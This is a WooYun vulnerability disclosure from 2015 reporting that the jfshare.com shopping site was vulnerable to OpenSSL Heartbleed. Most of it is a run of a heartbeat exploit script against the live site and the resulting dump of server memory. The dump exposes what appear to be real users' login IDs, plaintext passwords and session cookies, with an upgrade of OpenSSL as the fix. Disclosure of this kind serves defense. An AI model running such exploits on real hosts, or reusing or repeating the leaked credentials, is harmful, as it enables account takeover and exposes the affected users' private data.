当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120467

漏洞标题:聚分享网上商城主站OpenSSL Heartblood

相关厂商:聚分享网上商城

漏洞作者: 0c0c0f

提交时间:2015-06-18 11:51

修复时间:2015-08-02 11:52

公开时间:2015-08-02 11:52

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

聚分享网上商城是一个新型的电子商务综合平台,可支持积分兑换、积分+现金支付、电子券/二维码支付、话费账单支付、财付通、支付宝、银联在线等多种灵活的混合支付方式...

详细说明:

[root@iZ94rdoov1yZ exp]# python ssltest.py www.jfshare.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 2509
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 61 67 3D 31 ....#.......ag=1
00e0: 26 6F 72 64 65 72 53 74 61 74 65 3D 31 30 32 0D &orderState=102.
00f0: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language
0100: 3A 20 7A 68 2D 43 4E 0D 0A 55 73 65 72 2D 41 67 : zh-CN..User-Ag
0110: 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 ent: Mozilla/5.0
0120: 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 (compatible; MS
0130: 49 45 20 39 2E 30 3B 20 57 69 6E 64 6F 77 73 20 IE 9.0; Windows
0140: 4E 54 20 36 2E 31 3B 20 54 72 69 64 65 6E 74 2F NT 6.1; Trident/
0150: 35 2E 30 29 0D 0A 41 63 63 65 70 74 2D 45 6E 63 5.0)..Accept-Enc
0160: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def
0170: 6C 61 74 65 0D 0A 48 6F 73 74 3A 20 77 77 77 2E late..Host: www.
0180: 6A 66 73 68 61 72 65 2E 63 6F 6D 0D 0A 43 6F 6E jfshare.com..Con
0190: 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C nection: Keep-Al
01a0: 69 76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 43 4E 5A ive..Cookie: CNZ
01b0: 5A 44 41 54 41 31 30 30 30 32 30 37 38 34 31 3D ZDATA1000207841=
01c0: 36 31 38 39 31 34 37 31 33 2D 31 34 33 34 31 39 618914713-143419
01d0: 36 37 35 30 2D 25 37 43 31 34 33 34 32 37 30 38 6750-%7C14342708
01e0: 38 30 3B 20 70 72 6F 64 75 63 74 5F 76 69 65 77 80; product_view
01f0: 68 69 73 74 6F 72 79 73 3D 22 70 5F 31 38 39 30 historys="p_1890
0200: 30 30 31 2C 31 34 33 34 32 37 30 38 31 35 31 37 001,143427081517
0210: 30 7C 70 5F 32 30 31 30 31 34 34 2C 31 34 33 34 0|p_2010144,1434
0220: 31 39 38 33 39 34 38 34 33 7C 70 5F 31 36 38 30 198394843|p_1680
0230: 38 31 39 2C 31 34 33 34 31 39 38 32 36 30 33 33 819,143419826033
0240: 34 22 3B 20 63 61 72 74 3D 63 61 72 74 5F 32 34 4"; cart=cart_24
0250: 32 35 33 31 36 3B 20 4A 53 45 53 53 49 4F 4E 49 25316; JSESSIONI
0260: 44 3D 41 46 34 41 39 45 38 34 30 38 37 35 35 31 D=AF4A9E84087551
0270: 41 43 39 37 30 46 36 46 35 33 39 41 36 42 34 42 AC970F6F539A6B4B
0280: 42 30 3B 20 69 73 69 64 3D 65 39 31 63 62 33 61 B0; isid=e91cb3a
0290: 34 66 61 38 36 36 64 66 64 32 62 66 39 64 32 31 4fa866dfd2bf9d21
02a0: 39 35 39 66 62 37 37 65 36 36 35 38 34 30 34 37 959fb77e66584047
02b0: 30 3B 20 4A 53 45 53 53 49 4F 4E 49 44 3D 31 35 0; JSESSIONID=15
02c0: 30 45 30 33 38 33 39 32 37 36 35 35 37 35 38 46 0E0383927655758F
02d0: 43 32 39 46 34 33 42 30 34 31 43 33 32 44 3B 20 C29F43B041C32D;
02e0: 43 4E 5A 5A 44 41 54 41 31 30 30 30 32 30 37 38 CNZZDATA10002078
02f0: 34 31 3D 37 34 31 33 32 31 39 36 38 2D 31 34 33 41=741321968-143
0300: 34 32 36 35 37 37 38 2D 68 74 74 70 25 32 35 33 4265778-http%253
0310: 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2E 6A A%252F%252Fwww.j
0320: 66 73 68 61 72 65 2E 63 6F 6D 25 32 35 32 46 25 fshare.com%252F%
0330: 37 43 31 34 33 34 32 36 35 37 37 38 0D 0A 0D 0A 7C1434265778....
0340: 54 77 61 58 51 55 5D 94 26 F7 85 DD 3B 5F 0F 5E TwaXQU].&...;_.^
0350: 00 14 5B F4 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ..[.............
0360: 31 37 30 31 33 36 35 36 33 32 2D 31 34 33 33 39 1701365632-14339
0370: 30 39 31 30 39 2D 25 37 43 31 34 33 34 32 35 39 09109-%7C1434259
0380: 30 32 32 3B 20 69 73 69 64 3D 36 34 66 36 39 37 022; isid=64f697
0390: 38 34 32 66 65 30 35 32 63 39 64 62 30 32 33 66 842fe052c9db023f
03a0: 32 64 65 64 63 66 37 61 33 63 36 35 38 32 37 36 2dedcf7a3c658276
03b0: 33 33 0D 0A 0D 0A 6C 6F 67 69 6E 49 64 3D 25 45 33....loginId=%E
03c0: 39 25 42 45 25 39 41 25 45 35 25 42 39 25 42 34 9%BE%9A%E5%B9%B4
03d0: 25 45 39 25 39 33 25 42 36 26 70 61 73 73 77 6F %E9%93%B6&passwo
03e0: 72 64 3D 44 4D 59 31 32 32 32 26 56 61 6C 69 64 rd=DMY1222&Valid
03f0: 61 74 65 43 6F 64 65 3D 33 30 30 39 00 F5 A4 82 ateCode=3009....
0400: 51 78 EE 6B FA 82 D1 D8 AE 7F F0 30 0A 0A 0A 0A Qx.k.......0....
0410: 38 31 37 38 2D 31 34 33 33 37 34 36 32 31 30 2D 8178-1433746210-
0420: 25 37 43 31 34 33 34 30 38 30 36 35 31 3B 20 69 %7C1434080651; i
0430: 73 69 64 3D 37 30 34 65 30 30 34 39 61 39 65 30 sid=704e0049a9e0
0440: 34 35 37 64 38 65 36 37 37 65 39 31 30 61 31 64 457d8e677e910a1d
0450: 65 31 36 31 36 35 37 35 31 37 33 36 0D 0A 0D 0A e16165751736....
0460: 6C 6F 67 69 6E 49 64 3D 77 6D 73 33 31 25 34 30 loginId=wms31%40
0470: 73 69 6E 61 2E 63 6F 6D 26 70 61 73 73 77 6F 72 sina.com&passwor
0480: 64 3D 77 68 79 31 36 36 33 36 30 26 56 61 6C 69 d=why166360&Vali
0490: 64 61 74 65 43 6F 64 65 3D 38 33 32 32 57 D7 0E dateCode=8322W..
04a0: F9 35 D3 36 F1 90 BE 5C 2D B2 0A CF E1 72 65 65 .5.6...\-....ree
04b0: 3D 25 37 42 25 32 32 73 74 61 74 65 25 32 32 25 =%7B%22state%22%
04c0: 33 41 25 37 42 25 32 32 65 78 70 61 6E 64 65 64 3A%7B%22expanded
04d0: 25 32 32 25 33 41 25 35 42 25 32 32 73 25 33 41 %22%3A%5B%22s%3A
04e0: 63 6F 6C 5F 64 65 63 6F 72 61 74 65 53 68 6F 70 col_decorateShop
04f0: 25 32 32 25 32 43 25 32 32 73 25 33 41 63 74 6D %22%2C%22s%3Actm
0500: 70 6C 5F 32 30 30 5F 30 31 39 25 32 32 25 32 43 pl_200_019%22%2C
0510: 25 32 32 73 25 33 41 63 74 6D 70 6C 5F 32 30 30 %22s%3Actmpl_200
0520: 5F 30 36 30 30 30 5F 30 31 36 25 32 32 25 32 43 _06000_016%22%2C
0530: 25 32 32 73 25 33 41 63 5F 31 31 38 30 30 30 33 %22s%3Ac_1180003
0540: 25 32 32 25 32 43 25 32 32 73 25 33 41 63 5F 31 %22%2C%22s%3Ac_1
0550: 31 30 30 30 34 33 25 32 32 25 32 43 25 32 32 73 100043%22%2C%22s
0560: 25 33 41 63 74 6D 70 6C 5F 32 30 30 5F 30 31 31 %3Actmpl_200_011
0570: 25 32 32 25 32 43 25 32 32 73 25 33 41 63 5F 35 %22%2C%22s%3Ac_5
0580: 32 30 30 31 34 25 32 32 25 32 43 25 32 32 73 25 20014%22%2C%22s%
0590: 33 41 63 74 6D 70 6C 5F 32 30 30 5F 30 34 30 30 3Actmpl_200_0400
05a0: 5F 30 31 34 25 32 32 25 32 43 25 32 32 73 25 33 _014%22%2C%22s%3
05b0: 41 63 5F 35 32 30 30 32 30 25 32 32 25 32 43 25 Ac_520020%22%2C%
05c0: 32 32 73 25 33 41 63 74 6D 70 6C 5F 32 30 30 25 22s%3Actmpl_200%
05d0: 32 32 25 32 43 25 32 32 73 25 33 41 63 74 6D 70 22%2C%22s%3Actmp
05e0: 6C 5F 32 30 30 5F 31 34 30 25 32 32 25 32 43 25 l_200_140%22%2C%
05f0: 32 32 73 25 33 41 63 74 6D 70 6C 5F 32 30 30 5F 22s%3Actmpl_200_
0600: 30 31 30 25 32 32 25 32 43 25 32 32 73 25 33 41 010%22%2C%22s%3A
0610: 63 74 6D 70 6C 5F 30 30 30 5F 32 30 30 25 32 32 ctmpl_000_200%22
0620: 25 32 43 25 32 32 73 25 33 41 61 75 74 6F 5F 30 %2C%22s%3Aauto_0
0630: 30 30 5F 30 30 31 25 32 32 25 32 43 25 32 32 73 00_001%22%2C%22s
0640: 25 33 41 63 5F 35 32 30 30 32 36 25 32 32 25 32 %3Ac_520026%22%2
0650: 43 25 32 32 73 25 33 41 63 74 6D 70 6C 5F 32 30 C%22s%3Actmpl_20
0660: 30 5F 30 30 31 25 32 32 25 35 44 25 37 44 25 37 0_001%22%5D%7D%7
0670: 44 3B 20 4A 53 45 53 53 49 4F 4E 49 44 3D 31 45 D; JSESSIONID=1E
0680: 45 30 33 34 42 34 38 46 33 46 44 32 30 31 35 43 E034B48F3FD2015C
0690: 43 38 42 31 31 43 39 39 42 38 33 43 45 31 3B 20 C8B11C99B83CE1;
06a0: 69 73 69 64 3D 37 35 61 32 32 37 66 34 65 66 34 isid=75a227f4ef4
06b0: 39 62 36 32 32 31 63 65 35 63 65 39 39 39 61 33 9b6221ce5ce999a3
06c0: 65 34 64 63 37 36 35 36 32 31 33 35 38 3B 20 43 e4dc765621358; C
06d0: 4E 5A 5A 44 41 54 41 31 30 30 30 32 30 37 38 34 NZZDATA100020784
06e0: 31 3D 68 61 72 65 2E 63 6F 6D 25 32 35 32 46 25 1=hare.com%252F%
06f0: 37 43 31 34 33 33 38 34 34 31 39 30 0D 0A 0D 0A 7C1433844190....
0700: B0 DC 6F 01 B4 9B 71 8A 21 FC 4B FE A0 74 FA 63 ..o...q.!.K..t.c
0710: 08 41 DB B5 E3 96 00 00 00 00 00 00 00 00 00 00 .A..............
危害证明:

openssl.png


openssl1.png


openssl3.png


漏洞证明:

openssl.png


openssl1.png


openssl3.png


修复方案:

升级OpenSSL

版权声明:转载请注明来源 0c0c0f@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝